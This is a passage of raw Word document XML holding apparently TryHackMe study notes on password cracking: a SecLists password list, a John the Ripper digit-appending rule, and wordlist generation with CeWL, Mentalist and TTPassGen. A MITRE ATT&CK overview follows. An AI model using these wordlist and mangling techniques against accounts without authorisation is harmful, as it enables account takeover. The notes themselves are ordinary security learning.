        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. top 10k most used password list from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SecLists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="609F23D9" w14:textId="7D932BB7" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1200FE59" w14:textId="61431D4D" w:rsidR="00852EAE" w:rsidRPr="0084205E" w:rsidRDefault="00852EAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">generate simple border mutation by appending all </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>2 digit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> combinations at the end of each password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C7F367" w14:textId="24B4C9AB" w:rsidR="00852EAE" w:rsidRPr="0084205E" w:rsidRDefault="00852EAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">sudo nano </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>john-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>local</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46A97140" w14:textId="4FD43A09" w:rsidR="00852EAE" w:rsidRPr="0084205E" w:rsidRDefault="00852EAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>[List.Rules:THM01]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC3530C" w14:textId="719D1A39" w:rsidR="00852EAE" w:rsidRPr="0084205E" w:rsidRDefault="00852EAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>$[0-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>9]$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>[0-9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3304017B" w14:textId="3718F75E" w:rsidR="00852EAE" w:rsidRPr="0084205E" w:rsidRDefault="00852EAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Custom Wordlist Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D6A7EA" w14:textId="3516A3A0" w:rsidR="00852EAE" w:rsidRPr="0084205E" w:rsidRDefault="002225A0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>whenever you intend on reusing the wordlist often</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40901322" w14:textId="6285F731" w:rsidR="002225A0" w:rsidRPr="0084205E" w:rsidRDefault="002225A0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>use wordlist with several tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4868FED9" w14:textId="0ECC89C7" w:rsidR="002225A0" w:rsidRPr="0084205E" w:rsidRDefault="002225A0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>want to use a tool that supports wordlists but not mangling rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CE49CB" w14:textId="7D98F08C" w:rsidR="002225A0" w:rsidRPr="0084205E" w:rsidRDefault="002225A0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">find custom rule syntax of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>JtR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> too complex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5115C8" w14:textId="563852DD" w:rsidR="002225A0" w:rsidRPr="0084205E" w:rsidRDefault="002225A0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">If something is known about the password, relevant wordlists can be downloaded from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wordlistctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49CFC6D8" w14:textId="3D67B834" w:rsidR="002225A0" w:rsidRPr="0084205E" w:rsidRDefault="002225A0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>qex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>. if password is relevant to dogs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F126D25" w14:textId="0D504310" w:rsidR="002225A0" w:rsidRPr="0084205E" w:rsidRDefault="002225A0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wordlistctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> fetch -l dogs -d (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/dogs.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B297A7A" w14:textId="02CEFE62" w:rsidR="002225A0" w:rsidRPr="0084205E" w:rsidRDefault="002225A0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>use Mentalist to generate mutations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A01B0DE" w14:textId="28413C35" w:rsidR="002225A0" w:rsidRPr="0084205E" w:rsidRDefault="002225A0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>load wordlist into mentalist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AF8AE1" w14:textId="57A8DCED" w:rsidR="002225A0" w:rsidRPr="0084205E" w:rsidRDefault="002225A0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>add case, substitution, append/prepend rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04305ED8" w14:textId="5F4DD8C4" w:rsidR="002225A0" w:rsidRPr="0084205E" w:rsidRDefault="002225A0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>can export John/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4881B563" w14:textId="431618C3" w:rsidR="004743EF" w:rsidRPr="0084205E" w:rsidRDefault="004743EF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>CeWL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41C0CB47" w14:textId="6C8C2E67" w:rsidR="004743EF" w:rsidRPr="0084205E" w:rsidRDefault="004743EF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>custom wordlist generator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DD0BD8" w14:textId="788716A2" w:rsidR="004743EF" w:rsidRPr="0084205E" w:rsidRDefault="004743EF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>useful in retrieving words related to a specific topic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717C450D" w14:textId="7E5F395F" w:rsidR="004743EF" w:rsidRPr="0084205E" w:rsidRDefault="004743EF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cewl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -d 2 -w $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">)/example.txt </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://example.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="37951248" w14:textId="3153CD46" w:rsidR="004743EF" w:rsidRPr="0084205E" w:rsidRDefault="004743EF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-d is depth of link level spider will follow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F6D044" w14:textId="6751AEA8" w:rsidR="004743EF" w:rsidRPr="0084205E" w:rsidRDefault="004743EF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>TTPassGen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43A64689" w14:textId="56313633" w:rsidR="004743EF" w:rsidRPr="0084205E" w:rsidRDefault="004743EF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>craft wordlists from scratch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F936AB" w14:textId="06FB4858" w:rsidR="004743EF" w:rsidRPr="0084205E" w:rsidRDefault="004743EF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ttpassgen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> --rule '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>[?d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>]{4:4:*}' pin.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71131389" w14:textId="17A8637A" w:rsidR="004743EF" w:rsidRPr="0084205E" w:rsidRDefault="004743EF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">creates a wordlist containing all possible </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>four digit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> values for PIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FCED67" w14:textId="0DC6F548" w:rsidR="004743EF" w:rsidRPr="0084205E" w:rsidRDefault="004743EF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ttpassgen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> --rule '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>[?l</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>]{1:3:*}' abc.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BC8022" w14:textId="7F427835" w:rsidR="004743EF" w:rsidRPr="0084205E" w:rsidRDefault="004743EF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>generates a list of all lowercase character combinations of length 1-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340A7E4B" w14:textId="696088F9" w:rsidR="00F830F9" w:rsidRPr="0084205E" w:rsidRDefault="00F830F9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ttpassgen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dictlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pin.txt,abc.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>' --rule '$0[-]{1}$1' combination.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3773B391" w14:textId="6CBFE945" w:rsidR="00F830F9" w:rsidRPr="0084205E" w:rsidRDefault="00F830F9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>create a wordlist that is a combination of several wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1964E977" w14:textId="7E89E839" w:rsidR="00F830F9" w:rsidRPr="0084205E" w:rsidRDefault="00F830F9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>will generate huge files quickly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9EE14D" w14:textId="44DEE986" w:rsidR="00F830F9" w:rsidRPr="0084205E" w:rsidRDefault="00F830F9" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="457614C3" w14:textId="7BAE3194" w:rsidR="006576F5" w:rsidRPr="0084205E" w:rsidRDefault="006576F5" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>MITRE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467AEBEE" w14:textId="27B3FC65" w:rsidR="00970611" w:rsidRPr="0084205E" w:rsidRDefault="00970611" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ATT&amp;CK® (Adversarial Tactics, Techniques, and Common Knowledge) Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B9D570" w14:textId="6665DE5F" w:rsidR="00970611" w:rsidRPr="0084205E" w:rsidRDefault="00970611" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>CAR (Cyber Analytics Repository) Knowledge Base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183E1609" w14:textId="0C5546B3" w:rsidR="00970611" w:rsidRPr="0084205E" w:rsidRDefault="00970611" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SHIELD (sorry, not a fancy acronym) Active Defense</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E023EC" w14:textId="1DAE8340" w:rsidR="00970611" w:rsidRPr="0084205E" w:rsidRDefault="00970611" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>AEP (ATT&amp;CK Emulation Plans)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEDEA0B" w14:textId="5CE6A724" w:rsidR="00970611" w:rsidRPr="0084205E" w:rsidRDefault="00970611" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>APT – Advanced Persistent Threat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A6FFCD" w14:textId="67ECBBE6" w:rsidR="00970611" w:rsidRPr="0084205E" w:rsidRDefault="00970611" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>threat group or nation-state group</w:t>
      </w:r>
    </w:p>
